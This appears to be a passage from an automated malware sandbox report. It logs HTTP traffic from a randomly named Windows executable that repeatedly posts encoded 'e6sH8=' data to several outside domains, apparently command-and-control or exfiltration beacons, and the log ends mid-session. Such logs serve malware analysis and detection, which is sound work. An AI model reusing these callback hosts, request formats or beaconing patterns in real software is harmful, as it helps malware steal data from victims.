                                                                  Data Ascii: e6sH8=gWg0hdzfwUNWFbFgUwh3aotObdaEbruu5t9Mngxis/RVB59TmYazWCY3E3oz697jOQpW2vyU1j4l2MMxeWQKKTaLill83SrNIHPtwcUQT/Wt2pFS2Iq4kVQ2jnrY8dP4X2YK7LlZJv1XrEy9Ev5cy5CappaMRCtTLimW96/0AQzedNZkg1KsIDchku4V6cvUCk9k6VvNXpgkfcSTNq/Cb655tn8H+ub31S1+GXQhnvoV3ygKDWbuwOMdxhq9DAfQEoMjzOcjtFFNMCLj1K4fhG3LI2g88Ymi2vjupGRSnnpoEeIh/q31r1LtdLt3ebMgM2mQHa+ye4FChMl9PgzxvqTG3siRapeUr906RkfUcBYFS5GKLi509MuWTumogT1awVNxu+MsEQ4UJHR/0Ni6W39Mm+goDPM+peMDjg4lDoXmg9CU+YEeve0HSin5SDeOlmqTUz441Gs2pdjiD9z5/fzx2DEaGbTrmf4zLTkboj4cTXc4VXg66IcW9Q0nEjykueLAWCAGg5/HZV0gGRPVNQllw+xsenJcNAEjTIHKIjxSbuLjX46OX4fs6MyOgsA/7Ru8CK4DspsliJ279D28AFSqb/Nzxzk2Z+kSG6mDOYz3LDnVxubihWN+inHChpmCRC40cJ/j7ylThR/cN6Z16n11o1F2hpPCDUvCbhsqd6U/8bMfcYHm6wk4H18WO0C8efrYcIWBhzDHY2t1VbQygGQZWmcXuxFtqwrwM/WSXgLdDoOS4IG0lMO7zQk23/Yo4+aMM/Mn1V5xn3IsjRkQWlPCjROYFiUuMD0KeGI5RSy3oISgb9jQmZYePI4xSvd909HNEjN0lbc3UxZyU2agFWl6Gd2PZExjOhMZZGZ51LDU/LKhfO5Sqw8VRT37uiyeiPDpL/31V0mjMiPwjo0s8hRbFI2j+nfZxYmTnWZK73VVKmuHNzixy7AAKiV7sJZmSdOIu0jy2Se0/aC83Zunvx/HgOK+veNOPKp/w0YeYsHMz9 [TRUNCATED]
                                                                  Jan 11, 2025 01:23:19.915699959 CET992INHTTP/1.1 301 Moved Permanently
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 795
                                                                  date: Sat, 11 Jan 2025 00:23:19 GMT
                                                                  server: LiteSpeed
                                                                  location: https://www.cssa.auction/rjvg/
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  28192.168.2.550012107.167.84.42801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:23:21.900738955 CET433OUTGET /rjvg/?e6sH8=tUIUitDW424aYZRkIy55Xux7Uvf+CrCOh50QiitLwMhiL+1Z2tzWQWdXN3cz0curJDRK3/q9o39SyPNuZ2Q6MmyEpVR/4xibFk7xqZoKGfmGxLdx1ruWl0EgkmHv/8jyFg==&rr=BbldmNsp8 HTTP/1.1
                                                                  Host: www.cssa.auction
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Jan 11, 2025 01:23:22.454224110 CET1144INHTTP/1.1 301 Moved Permanently
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 795
                                                                  date: Sat, 11 Jan 2025 00:23:22 GMT
                                                                  server: LiteSpeed
                                                                  location: https://www.cssa.auction/rjvg/?e6sH8=tUIUitDW424aYZRkIy55Xux7Uvf+CrCOh50QiitLwMhiL+1Z2tzWQWdXN3cz0curJDRK3/q9o39SyPNuZ2Q6MmyEpVR/4xibFk7xqZoKGfmGxLdx1ruWl0EgkmHv/8jyFg==&rr=BbldmNsp8
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  29192.168.2.550013209.74.77.109801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:23:27.510284901 CET698OUTPOST /4r26/ HTTP/1.1
                                                                  Host: www.moviebuff.info
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.moviebuff.info
                                                                  Content-Length: 206
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.moviebuff.info/4r26/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Raw: 65 36 73 48 38 3d 33 50 47 55 6f 45 37 54 7a 4c 76 6d 55 35 41 72 59 2f 47 53 42 34 73 75 54 41 66 66 2b 44 64 67 41 79 59 38 61 44 4a 59 42 64 75 57 74 30 53 73 5a 69 6f 62 61 4f 46 69 42 61 35 74 66 72 4b 41 42 32 6d 30 34 46 72 61 39 4e 71 63 71 6a 43 55 32 4a 6c 70 53 61 45 6b 45 51 57 57 56 42 44 61 41 2f 4a 42 6c 30 50 6c 36 49 53 39 56 75 74 66 68 42 55 71 48 43 4a 32 77 57 4e 2b 4c 4a 72 72 67 4f 31 65 6f 36 6a 6c 50 54 74 2b 42 70 55 31 59 33 66 63 33 32 50 79 52 36 62 65 51 6f 4d 32 36 31 38 32 66 36 71 32 41 7a 63 33 70 4e 68 49 4c 74 54 59 52 5a 36 65 50 53 70 36 61 5a 30 38 4d 75 58 69 34 56 51 3d
                                                                  Data Ascii: e6sH8=3PGUoE7TzLvmU5ArY/GSB4suTAff+DdgAyY8aDJYBduWt0SsZiobaOFiBa5tfrKAB2m04Fra9NqcqjCU2JlpSaEkEQWWVBDaA/JBl0Pl6IS9VutfhBUqHCJ2wWN+LJrrgO1eo6jlPTt+BpU1Y3fc32PyR6beQoM26182f6q2Azc3pNhILtTYRZ6ePSp6aZ08MuXi4VQ=
                                                                  Jan 11, 2025 01:23:28.090332985 CET533INHTTP/1.1 404 Not Found
                                                                  Date: Sat, 11 Jan 2025 00:23:27 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  30192.168.2.550014209.74.77.109801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:23:30.067981958 CET718OUTPOST /4r26/ HTTP/1.1
                                                                  Host: www.moviebuff.info
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.moviebuff.info
                                                                  Content-Length: 226
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.moviebuff.info/4r26/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Raw: 65 36 73 48 38 3d 33 50 47 55 6f 45 37 54 7a 4c 76 6d 57 59 77 72 4c 6f 53 53 56 6f 73 76 50 77 66 66 78 6a 64 6b 41 79 55 38 61 42 6b 48 64 2f 36 57 74 55 43 73 59 6e 45 62 64 4f 46 69 4b 36 35 6b 62 72 4b 31 42 32 69 6a 34 45 58 61 39 4e 75 63 71 6d 2b 55 33 2b 35 6f 49 71 45 6d 4e 77 57 59 49 78 44 61 41 2f 4a 42 6c 30 79 4b 36 49 71 39 56 65 39 66 7a 31 67 74 4b 69 4a 31 34 32 4e 2b 63 35 72 76 67 4f 31 38 6f 37 4f 77 50 52 6c 2b 42 72 4d 31 5a 6c 6e 64 2b 32 50 38 4d 71 62 4c 63 4b 68 69 34 45 73 70 66 59 7a 38 66 31 73 71 6f 37 51 69 52 50 62 77 43 35 57 6d 66 42 68 4e 4c 70 56 56 57 4e 48 53 6d 43 45 45 75 4f 6c 35 57 31 4a 4f 59 6b 79 6e 50 4e 6f 2b 71 45 32 58
                                                                  Data Ascii: e6sH8=3PGUoE7TzLvmWYwrLoSSVosvPwffxjdkAyU8aBkHd/6WtUCsYnEbdOFiK65kbrK1B2ij4EXa9Nucqm+U3+5oIqEmNwWYIxDaA/JBl0yK6Iq9Ve9fz1gtKiJ142N+c5rvgO18o7OwPRl+BrM1Zlnd+2P8MqbLcKhi4EspfYz8f1sqo7QiRPbwC5WmfBhNLpVVWNHSmCEEuOl5W1JOYkynPNo+qE2X
                                                                  Jan 11, 2025 01:23:30.651897907 CET533INHTTP/1.1 404 Not Found
                                                                  Date: Sat, 11 Jan 2025 00:23:30 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  31192.168.2.550015209.74.77.109801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:23:32.615881920 CET1735OUTPOST /4r26/ HTTP/1.1
                                                                  Host: www.moviebuff.info
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.moviebuff.info
                                                                  Content-Length: 1242
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.moviebuff.info/4r26/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Raw: 65 36 73 48 38 3d 33 50 47 55 6f 45 37 54 7a 4c 76 6d 57 59 77 72 4c 6f 53 53 56 6f 73 76 50 77 66 66 78 6a 64 6b 41 79 55 38 61 42 6b 48 64 2f 69 57 74 6e 61 73 5a 45 38 62 63 4f 46 69 44 61 35 68 62 72 4b 73 42 79 50 4c 34 45 62 67 39 50 47 63 71 41 4b 55 2f 71 4e 6f 64 36 45 6d 41 51 57 5a 56 42 44 50 41 2f 5a 46 6c 30 43 4b 36 49 71 39 56 64 56 66 78 68 55 74 49 69 4a 32 77 57 4e 36 4c 4a 72 54 67 4f 74 47 6f 37 4c 4c 50 67 46 2b 43 4c 63 31 65 51 7a 64 2f 57 50 70 50 71 61 4f 63 4b 74 55 34 45 77 74 66 5a 58 53 66 79 41 71 71 4f 39 71 57 74 72 4c 52 66 32 58 54 78 64 42 4c 73 73 77 54 65 54 47 72 53 51 35 69 4d 4e 4e 64 44 52 2b 55 47 48 53 54 72 4a 6c 37 6a 7a 64 67 49 32 37 4e 76 4c 61 47 66 2b 2b 47 37 6a 30 57 75 51 67 33 42 55 34 35 48 2b 74 30 43 43 75 30 5a 4e 77 61 33 6d 6e 56 41 78 32 4f 49 4f 34 7a 56 64 34 48 65 47 32 64 43 6c 5a 6e 75 35 6d 76 62 77 70 59 67 47 6f 5a 42 42 67 4c 4e 47 6f 58 59 45 6e 57 35 2b 5a 67 62 59 49 49 70 57 62 46 32 70 32 51 75 63 66 76 36 4b 59 35 43 76 53 [TRUNCATED]
                                                                  Data Ascii: e6sH8=3PGUoE7TzLvmWYwrLoSSVosvPwffxjdkAyU8aBkHd/iWtnasZE8bcOFiDa5hbrKsByPL4Ebg9PGcqAKU/qNod6EmAQWZVBDPA/ZFl0CK6Iq9VdVfxhUtIiJ2wWN6LJrTgOtGo7LLPgF+CLc1eQzd/WPpPqaOcKtU4EwtfZXSfyAqqO9qWtrLRf2XTxdBLsswTeTGrSQ5iMNNdDR+UGHSTrJl7jzdgI27NvLaGf++G7j0WuQg3BU45H+t0CCu0ZNwa3mnVAx2OIO4zVd4HeG2dClZnu5mvbwpYgGoZBBgLNGoXYEnW5+ZgbYIIpWbF2p2Qucfv6KY5CvSH/4sEJwnz8NLfs1bkjzAA3/6zNOVSJx/zNU8wb4Cgcvl65hifR+ZCw0ROIMwvIHxW1Zslq6fcdcM2B0aSO8GmCKaJ4L0dXAjZZGETI6hLe5phMGfY2Sfeq+rbRgaAHPJVkJsYzNMaPrtMVSrQKZnKvO+EmDGX9UI4u7lB0Jw5/gFS8BLMPjtRwelzwusSOZKbhPzUYSVy1xp30ffbHACh+C4zA7VRUikIus2ljyhPRKe0aljBL9xoHMkM970iu4c8k04zomEcMjMf45OGNRq421OHgblrf+9QEFzxELNqp+ZCFWijk9sXCRRiSCUERyqtxkckf/LdEGl/7KXHXQa4wjcBrRaA5vQkWrsp3SmyqYDskSykfWIipA6TbZ91iyLBlhr98Ub3M7H4Pva5tFFiKizHcmDkBCoeMxo83rt8RxvaD/oGOw1eSCULnX5nOXRIlN8CKhoYucHJsFBUNtK+MuB1gaeX6rQ5HvqlHVTUJx71jBYlK8ok6POWjPUeJnisnRpabn04AHU4glfb42tqtl6J4Md1mig0yZ6rAWOPTmW6t0EmKyZIaVgK4ghxwagL1YhIOiSEd7figv/9ifG802WVf0+Ott3kcizYUYEqTY1WVhNwH7GbNiU/y89p7L4sIBdIZ9zuZQYDbw7Tdi/yBOgfhbSVav7n1 [TRUNCATED]
                                                                  Jan 11, 2025 01:23:33.179502010 CET533INHTTP/1.1 404 Not Found
                                                                  Date: Sat, 11 Jan 2025 00:23:33 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  32192.168.2.550016209.74.77.109801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:23:35.165673971 CET435OUTGET /4r26/?e6sH8=6Nu0rwDBxqyxMqkAEP2GSfhicAip3HxzZXQ7XTYJGNWQuHKPGXYdStA7Or1ZV5iEeiylzT/9sq3lky3p7a80etZ5Cy+PRwnxMf10/xPOo/zDftN59BIXLil1jV1mDemi+A==&rr=BbldmNsp8 HTTP/1.1
                                                                  Host: www.moviebuff.info
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Jan 11, 2025 01:23:35.767946959 CET548INHTTP/1.1 404 Not Found
                                                                  Date: Sat, 11 Jan 2025 00:23:35 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  33192.168.2.550017199.59.243.228801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:23:40.868402004 CET698OUTPOST /rfcw/ HTTP/1.1
                                                                  Host: www.whisperart.net
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.whisperart.net
                                                                  Content-Length: 206
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.whisperart.net/rfcw/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
